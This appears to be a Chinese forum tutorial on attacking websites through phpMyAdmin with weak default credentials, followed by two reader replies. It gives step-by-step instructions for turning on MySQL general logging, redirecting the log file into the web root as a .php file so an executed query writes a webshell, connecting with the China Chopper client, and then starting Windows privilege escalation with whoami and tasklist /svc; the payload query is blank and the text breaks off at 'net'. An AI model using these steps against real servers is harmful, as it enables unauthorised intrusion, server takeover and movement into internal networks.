黑客入侵数据库指令

phpMyAdmin弱口令，从数据库杀到内网一条龙
超超超超超详细

ps：不混娱乐圈，mors是我大哥，不服喷他

什么是phpMyAdmin？

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法，方便编写网页时所需要的sql语法正确性。

以上这些都不重要，重要的是能干什么？[滑稽]

phpMyAdmin在配置的时候，如果不去修改，默认账号密码就是root/root
什么？你问我他为什么不去修改？
不是每个人都懂这些的好吧？
看看有多少傻瓜式搭建网站的帖子就知道了
当初在帮别人改代码的时候
惊奇的发现源码里面有木马！
更可笑的是，还跟我说是特意这样写的！
着实把我逗笑了
偏偏小白们还看不出来

好了好了，言归正传

弱口令进了数据库我们能干嘛呢？
当然是拿shell啊

先找网站的根目录
一个是是否开启，一个是写入路径
general_log          一般是off，改成on
general_log_file   C:\phpStudy\WWW\log.php
改成你喜欢的名字，比如：
general_log_file   C:\phpStudy\WWW\123.php

执行一句话：
select ;
这样木马就被写入了123.php里面
密码是666，菜刀连接
原理就是，你执行的sql语句会被日志记录下来

拿到shell之后呢？当然是提权啦！
用shell打开虚拟终端
1.whoami看看啥权限
（有的是system权限，还有的可能是Administrator，还有比较鸡贼的，看似是Administrator，实际权限低的可怜）

2.tasklist  /svc 找远程服务（Windows远程服务名称为：TermService）记录PID

3.net

为保住菊花，这个一定得回复！

垃圾内容，路过为证。